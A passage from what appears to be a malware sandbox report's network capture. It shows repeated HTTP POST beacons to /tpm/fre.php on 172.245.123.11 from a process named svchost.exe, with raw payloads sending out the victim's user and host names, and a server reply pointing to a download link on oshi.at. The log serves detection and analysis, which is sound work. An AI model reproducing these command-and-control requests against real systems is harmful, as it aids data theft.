Jan 7, 2025 11:03:48.079188108 CET	50136	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:48.083973885 CET	80	50136	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:48.599855900 CET	80	50136	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:48.599950075 CET	80	50136	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:48.599994898 CET	50136	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:48.600023985 CET	50136	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:48.604851007 CET	80	50136	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:48.738837957 CET	50137	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:48.743715048 CET	80	50137	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:48.743794918 CET	50137	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:48.745882034 CET	50137	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:48.750680923 CET	80	50137	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:48.750749111 CET	50137	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:48.755521059 CET	80	50137	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:49.272100925 CET	80	50137	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:49.272118092 CET	80	50137	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:49.272186041 CET	50137	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:49.299638033 CET	50137	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:49.306405067 CET	80	50137	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:49.434294939 CET	50138	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:49.441288948 CET	80	50138	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:49.441371918 CET	50138	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:49.443593025 CET	50138	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:49.450885057 CET	80	50138	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:49.450938940 CET	50138	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:49.457834959 CET	80	50138	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:49.952893019 CET	80	50138	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:49.952987909 CET	50138	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:49.953043938 CET	80	50138	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:49.953084946 CET	50138	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:49.959959030 CET	80	50138	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:50.082169056 CET	50139	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:50.086988926 CET	80	50139	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:50.087069988 CET	50139	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:50.089078903 CET	50139	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:50.093852997 CET	80	50139	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:50.093929052 CET	50139	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:50.098769903 CET	80	50139	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:50.591058016 CET	80	50139	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:50.591173887 CET	80	50139	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:50.591200113 CET	50139	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:50.591223955 CET	50139	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:50.596015930 CET	80	50139	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:50.723057032 CET	50140	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:50.727849960 CET	80	50140	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:50.729959011 CET	50140	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:50.732063055 CET	50140	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:50.739063978 CET	80	50140	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:50.740699053 CET	50140	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:50.745553970 CET	80	50140	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:51.247888088 CET	80	50140	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:51.248013973 CET	80	50140	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:51.248033047 CET	50140	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:51.248064041 CET	50140	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:51.252939939 CET	80	50140	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:51.379426003 CET	50141	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:51.384576082 CET	80	50141	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:51.384699106 CET	50141	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:51.386800051 CET	50141	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:51.391577005 CET	80	50141	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:51.391659021 CET	50141	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:51.396697998 CET	80	50141	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:51.922112942 CET	80	50141	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:51.922208071 CET	50141	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:51.922271013 CET	80	50141	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:51.922317028 CET	50141	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:51.927639008 CET	80	50141	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:52.051234961 CET	50142	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:52.056072950 CET	80	50142	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:52.056159019 CET	50142	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:52.058275938 CET	50142	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:52.063070059 CET	80	50142	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:52.063133955 CET	50142	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:52.070691109 CET	80	50142	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:52.591394901 CET	80	50142	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:52.591519117 CET	50142	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:52.591820955 CET	80	50142	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:52.591880083 CET	50142	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:52.596275091 CET	80	50142	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:52.727746964 CET	50143	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:52.732557058 CET	80	50143	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:52.732660055 CET	50143	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:52.734746933 CET	50143	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:52.739496946 CET	80	50143	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:52.739568949 CET	50143	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:52.744282007 CET	80	50143	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:53.254230976 CET	80	50143	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:53.254331112 CET	50143	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:53.254374981 CET	80	50143	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:53.254429102 CET	50143	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:53.259143114 CET	80	50143	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:53.378722906 CET	50144	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:53.383596897 CET	80	50144	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:53.383714914 CET	50144	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:53.386064053 CET	50144	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:53.390794992 CET	80	50144	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:53.390870094 CET	50144	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:53.395586014 CET	80	50144	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:53.917356014 CET	80	50144	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:53.917455912 CET	50144	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:53.917994022 CET	80	50144	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:53.918045998 CET	50144	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:53.922319889 CET	80	50144	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:54.050762892 CET	50145	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:54.055568933 CET	80	50145	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:54.055644989 CET	50145	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:54.057760954 CET	50145	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:54.062496901 CET	80	50145	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:54.062572002 CET	50145	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:54.067321062 CET	80	50145	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:54.583080053 CET	80	50145	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:54.583190918 CET	80	50145	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:54.583210945 CET	50145	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:54.583241940 CET	50145	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:54.588579893 CET	80	50145	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:54.706964970 CET	50146	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:54.711775064 CET	80	50146	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:54.711884975 CET	50146	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:54.713995934 CET	50146	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:54.718858004 CET	80	50146	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:54.718933105 CET	50146	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:54.723706961 CET	80	50146	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:55.236610889 CET	80	50146	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:55.236735106 CET	50146	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:55.236778021 CET	80	50146	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:55.236824989 CET	50146	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:55.241475105 CET	80	50146	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:55.363739014 CET	50147	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:55.368577003 CET	80	50147	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:55.368650913 CET	50147	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:55.370740891 CET	50147	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:55.375533104 CET	80	50147	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:55.375591993 CET	50147	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:55.380965948 CET	80	50147	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:55.875785112 CET	80	50147	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:55.875901937 CET	50147	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:55.875955105 CET	80	50147	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:55.876003027 CET	50147	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:55.880700111 CET	80	50147	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:56.004338980 CET	50148	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:56.009171009 CET	80	50148	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:56.009361982 CET	50148	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:56.011501074 CET	50148	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:56.016302109 CET	80	50148	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:56.016359091 CET	50148	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:56.021137953 CET	80	50148	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:56.528043032 CET	80	50148	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:56.528121948 CET	80	50148	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:56.528237104 CET	50148	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:56.528317928 CET	50148	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:56.533026934 CET	80	50148	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:56.660552979 CET	50149	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:56.665401936 CET	80	50149	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:56.665600061 CET	50149	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:56.667726994 CET	50149	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:56.672554970 CET	80	50149	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:56.672621965 CET	50149	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:56.677428961 CET	80	50149	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:57.196450949 CET	80	50149	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:57.196552992 CET	80	50149	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:57.196556091 CET	50149	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:57.196599960 CET	50149	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:57.201332092 CET	80	50149	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:57.332197905 CET	50150	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:57.336971045 CET	80	50150	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:57.337205887 CET	50150	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:57.339339018 CET	50150	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:57.344206095 CET	80	50150	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:57.344265938 CET	50150	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:57.349037886 CET	80	50150	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:57.860636950 CET	80	50150	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:57.860744953 CET	80	50150	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:57.860802889 CET	50150	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:57.860802889 CET	50150	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:57.865550995 CET	80	50150	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:58.016447067 CET	50151	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:58.021249056 CET	80	50151	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:58.021342993 CET	50151	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:58.023457050 CET	50151	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:58.028286934 CET	80	50151	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:58.028337002 CET	50151	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:58.033070087 CET	80	50151	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:58.560226917 CET	80	50151	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:58.560448885 CET	80	50151	172.245.123.11	192.168.2.5
Jan 7, 2025 11:03:58.560538054 CET	50151	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:58.560575962 CET	50151	80	192.168.2.5	172.245.123.11
Jan 7, 2025 11:03:58.565391064 CET	80	50151	172.245.123.11	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 11:01:58.613193035 CET	61374	53	192.168.2.5	1.1.1.1
Jan 7, 2025 11:01:58.622076988 CET	53	61374	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 11:01:58.613193035 CET	192.168.2.5	1.1.1.1	0x3497	Standard query (0)	oshi.at	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 11:01:58.622076988 CET	1.1.1.1	192.168.2.5	0x3497	No error (0)	oshi.at		194.15.112.248	A (IP address)	IN (0x0001)	false
Jan 7, 2025 11:01:58.622076988 CET	1.1.1.1	192.168.2.5	0x3497	No error (0)	oshi.at		5.253.86.15	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

oshi.at

172.245.123.11

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:01:56.709935904 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 180 Connection: close
Jan 7, 2025 11:01:56.715462923 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons536720ALFONS-PCk0FDD42EE188E931437F4FBE2CFacyg
Jan 7, 2025 11:01:57.233551025 CET	263	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:01:57 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 15 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:01:57.377790928 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 180 Connection: close
Jan 7, 2025 11:01:57.382608891 CET	180	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: 'ckav.rualfons536720ALFONS-PC+0FDD42EE188E931437F4FBE2CUH1aT
Jan 7, 2025 11:01:57.878271103 CET	263	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:01:57 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 15 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:01:57.939043045 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:01:57.943922997 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:01:58.457973003 CET	307	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:01:58 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 59 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 2c 00 00 00 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 14 00 00 00 68 74 74 70 73 3a 2f 2f 6f 73 68 69 2e 61 74 2f 72 74 42 53 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: ,https://oshi.at/rtBSFile not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49708	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:01:58.641072035 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:01:58.646332979 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:01:59.167339087 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:01:59 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49709	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:01:59.321314096 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:01:59.326148033 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:01:59.826330900 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:01:59 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49710	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:01:59.970819950 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:01:59.975651979 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:00.489820004 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:00 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49711	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:00.665031910 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:00.675298929 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:01.182199001 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:01 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49712	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:01.366624117 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
Jan 7, 2025 11:02:01.372775078 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
Jan 7, 2025 11:02:01.907716990 CET	271	IN	HTTP/1.0 404 Not Found Date: Tue, 07 Jan 2025 10:02:01 GMT Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40 X-Powered-By: PHP/5.6.40 Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49714	172.245.123.11	80	6784	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:02:02.096334934 CET	238	OUT	POST /tpm/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 172.245.123.11 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D3AFB906 Content-Length: 153 Connection: close
